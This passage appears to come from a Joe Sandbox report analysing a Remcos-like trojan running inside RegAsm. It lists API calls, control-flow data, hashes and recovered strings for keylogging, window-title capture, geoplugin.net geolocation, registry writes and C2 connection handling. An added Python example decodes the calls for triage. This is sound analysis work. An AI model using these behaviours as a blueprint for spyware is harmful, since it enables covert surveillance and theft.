                                                        control_flow_graph 1051 4048c8-4048e8 connect 1052 404a1b-404a1f 1051->1052 1053 4048ee-4048f1 1051->1053 1056 404a21-404a2f WSAGetLastError 1052->1056 1057 404a97 1052->1057 1054 404a17-404a19 1053->1054 1055 4048f7-4048fa 1053->1055 1058 404a99-404a9e 1054->1058 1059 404926-404930 call 420c60 1055->1059 1060 4048fc-404923 call 40531e call 402093 call 41b4ef 1055->1060 1056->1057 1061 404a31-404a34 1056->1061 1057->1058 1070 404941-40494e call 420e8f 1059->1070 1071 404932-40493c 1059->1071 1060->1059 1064 404a71-404a76 1061->1064 1065 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1061->1065 1067 404a7b-404a94 call 402093 * 2 call 41b4ef 1064->1067 1065->1057 1067->1057 1084 404950-404973 call 402093 * 2 call 41b4ef 1070->1084 1085 404987-404992 call 421a40 1070->1085 1071->1067 1114 404976-404982 call 420ca0 1084->1114 1097 4049c4-4049d1 call 420e06 1085->1097 1098 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1085->1098 1108 4049d3-4049f6 call 402093 * 2 call 41b4ef 1097->1108 1109 4049f9-404a14 CreateEventW * 2 1097->1109 1098->1114 1108->1109 1109->1054 1114->1057
                                                        APIs
                                                        • connect.WS2_32(?,?,?), ref: 004048E0
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                        • API String ID: 994465650-2151626615
                                                        • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                        • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                        • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                        • GetForegroundWindow.USER32 ref: 0040AD49
                                                        • GetWindowTextLengthW.USER32 ref: 0040AD52
                                                        • GetWindowTextW.USER32 ref: 0040AD86
                                                        • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                        • API String ID: 911427763-3954389425
                                                        • Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                                        • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                        • Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                                        • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        [graph rendered as an image in the original report; executed and not-executed blocks are colour-coded. Basic blocks span 40da34-40dc1b; the only imported API in the graph is GetLongPathNameW, with subcalls into 40417e, 40ddd1, 402fa5, 401f09, 41b5b4, 41bfb7, 43c0cf and 409057]
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LongNamePath
                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                        • API String ID: 82841172-425784914
                                                        • Opcode ID: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                                                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                        • Opcode Fuzzy Hash: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                                                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        [graph rendered as an image in the original report; executed and not-executed blocks are colour-coded. Basic blocks span 44ac49-44ae64; imported APIs in the graph are MultiByteToWideChar (two call sites) and WideCharToMultiByte, with subcalls into 446766, 457190, 446137, 448bb3, 435e40 and 434fcb]
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                        • __freea.LIBCMT ref: 0044AE30
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        • __freea.LIBCMT ref: 0044AE39
                                                        • __freea.LIBCMT ref: 0044AE5E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 3864826663-0
                                                        • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                        • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        [graph rendered as an image in the original report; executed and not-executed blocks are colour-coded. Basic blocks span 41b380-41b431; the graph is a single InternetOpenW / InternetOpenUrlW setup, an InternetReadFile read loop (41b3c5-41b413) and a two-handle InternetCloseHandle exit]
                                                        APIs
                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                        Strings
                                                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                        • String ID: http://geoplugin.net/json.gp
                                                        • API String ID: 3121278467-91888290
                                                        • Opcode ID: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                                                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                        • Opcode Fuzzy Hash: a69ade3d4837a55be9fd6a93abde095b6ea90823e789e142765cb78eb82537c4
                                                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        [graph rendered as an image in the original report; executed and not-executed blocks are colour-coded. Basic blocks span 41c3f1-41c484: CreateFileW, an optional SetFilePointer (41c448-41c456) before WriteFile, and CloseHandle on both the success and the failure path]
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                        • String ID: hpF
                                                        • API String ID: 1852769593-151379673
                                                        • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                        • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                        • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                        • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        [graph rendered as an image in the original report; executed and not-executed blocks are colour-coded. Basic blocks span 41b2c3-41b37f; the only imported API in the graph is StrToIntA, with subcalls into 41bfb7, 4135a6, 401fe2, 401fd8, 406ae1, 401fab, 41cf69 and 40537d]
                                                        APIs
                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                          • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                        • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                        • API String ID: 1866151309-2070987746
                                                        • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                        • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph
                                                        [graph rendered as an image in the original report; executed and not-executed blocks are colour-coded. Basic blocks span 40a675-40a725: a loop (40a690-40a6fd) of CreateFileW, GetFileSize, Sleep and CloseHandle, with subcalls into 40b0dc, 40905c and 40a179 on exit]
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                        • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                        • String ID: XQG
                                                        • API String ID: 1958988193-3606453820
                                                        • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                        • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                        • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                        • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
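The API lines in the function blocks above carry more than the API name: the raw argument constants identify what the call does. The CreateFileW at 0041C430 opens with access 40000000 (GENERIC_WRITE) and disposition 00000002 (CREATE_ALWAYS) and is followed by SetFilePointer with move method 00000002 (FILE_END), i.e. an append-to-file; the CreateFileW at 0040A6AB opens with 80000000 (GENERIC_READ), share 00000007 and disposition 00000003 (OPEN_EXISTING) inside a loop with Sleep(00002710), i.e. a 10-second file-size poll; the registry opens pass 80000001 (HKEY_CURRENT_USER); and InternetOpenUrlW carries the http://geoplugin.net/json.gp URL inline. The following Python is an added example, not part of the Joe Sandbox report or of the Remcos code: it parses API lines in this report's format and decodes those constants. The sample input is constructed from lines copied off this page; the flag tables are the documented Win32 values; the regular expression and the summary layout are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample input: API-call lines copied from the function blocks of
# this report (RegAsm memory dump). Subcall lines keep the "Part of subcall
# function ...:" prefix and one line has no argument list, as in the report.
SAMPLE_LINES = """
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
• Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
"""

# Pattern for "<Api>.<MODULE>(<args>), ref: <addr>"; the argument list is
# optional because the report omits it for some calls (assumption: one call
# per line, which holds for the report format).
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)?"
    r" ref: (?P<ref>[0-9A-Fa-f]{8})"
)

# Documented Win32 constants used to decode the raw arguments.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_END = 2  # SetFilePointer dwMoveMethod
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str


def _hex(arg):
    """The report prints unknown arguments as '?' and strings verbatim;
    only an 8-digit hex constant is converted, anything else yields None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def _flags(value, table):
    """Expand a bit mask into the names of the set bits ('0' for none)."""
    return [name for bit, name in table.items() if value & bit] or ["0"]


def parse_api_lines(text):
    """Turn report API lines into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            args = m.group("args").split(",") if m.group("args") is not None else []
            calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref").upper()))
    return calls


def decode_create_file(call):
    """CreateFileW(name, access, share, security, disposition, flags, template)."""
    access, share, disp = (_hex(call.args[i]) or 0 for i in (1, 2, 4))
    return {"access": _flags(access, GENERIC_ACCESS),
            "share": _flags(share, SHARE_MODE),
            "disposition": DISPOSITION.get(disp, hex(disp))}


def summarize(text):
    """Collect the behaviour-relevant facts: URLs passed as arguments, decoded
    file opens, seeks to end of file, registry hives touched and sleep lengths."""
    summary = {"urls": [], "file_opens": [], "seek_to_end": [],
               "registry_hives": [], "sleeps_ms": []}
    for call in parse_api_lines(text):
        summary["urls"].extend(a for a in call.args if a.startswith(("http://", "https://")))
        if call.api in ("CreateFileW", "CreateFileA") and len(call.args) >= 5:
            summary["file_opens"].append((call.ref, decode_create_file(call)))
        elif call.api == "SetFilePointer" and len(call.args) >= 4 and _hex(call.args[3]) == FILE_END:
            summary["seek_to_end"].append(call.ref)
        elif call.api.startswith(("RegOpenKey", "RegCreateKey")) and call.args:
            hive = HIVES.get(_hex(call.args[0]))
            if hive:
                summary["registry_hives"].append((call.ref, hive))
        elif call.api == "Sleep" and call.args and _hex(call.args[0]) is not None:
            summary["sleeps_ms"].append((call.ref, _hex(call.args[0])))
    return summary


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Running the block on the sample reports the geoplugin URL, the GENERIC_WRITE/CREATE_ALWAYS open at 0041C430 next to the FILE_END seek at 0041C44D, the GENERIC_READ/OPEN_EXISTING open at 0040A6AB with a 10000 ms sleep at 0040A6E7, and two HKEY_CURRENT_USER key opens; paste further API lines from the report into SAMPLE_LINES to triage the remaining functions the same way.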

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountEventTick
                                                        • String ID: !D@$NG
                                                        • API String ID: 180926312-2721294649
                                                        • Opcode ID: 33767b7051b298e2fabd8bf43bc115551dafe8336a461eebe98c5c6399c2f375
                                                        • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                        • Opcode Fuzzy Hash: 33767b7051b298e2fabd8bf43bc115551dafe8336a461eebe98c5c6399c2f375
                                                        • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread$LocalTimewsprintf
                                                        • String ID: Offline Keylogger Started
                                                        • API String ID: 465354869-4114347211
                                                        • Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                                        • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                        • Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                                        • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                        Strings
                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$EventLocalThreadTime
                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                        • API String ID: 2532271599-1507639952
                                                        • Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                                        • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                        • Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                                        • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                        • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                        • RegCloseKey.KERNEL32(?), ref: 004137B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID: pth_unenc
                                                        • API String ID: 1818849710-4028850238
                                                        • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                                        • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                        • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                                        • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                        • CloseHandle.KERNEL32(?), ref: 00404DDB
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 3360349984-0
                                                        • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                                        • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                        • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                                        • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                        • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$ErrorLast
                                                        • String ID:
                                                        • API String ID: 3177248105-0
                                                        • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                        • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                        • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                        • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                        • GetLastError.KERNEL32 ref: 0040D083
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateErrorLastMutex
                                                        • String ID: SG
                                                        • API String ID: 1925916568-3189917014
                                                        • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                        • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                        • RegQueryValueExA.KERNEL32 ref: 004135E7
                                                        • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                        Memory Dump Source
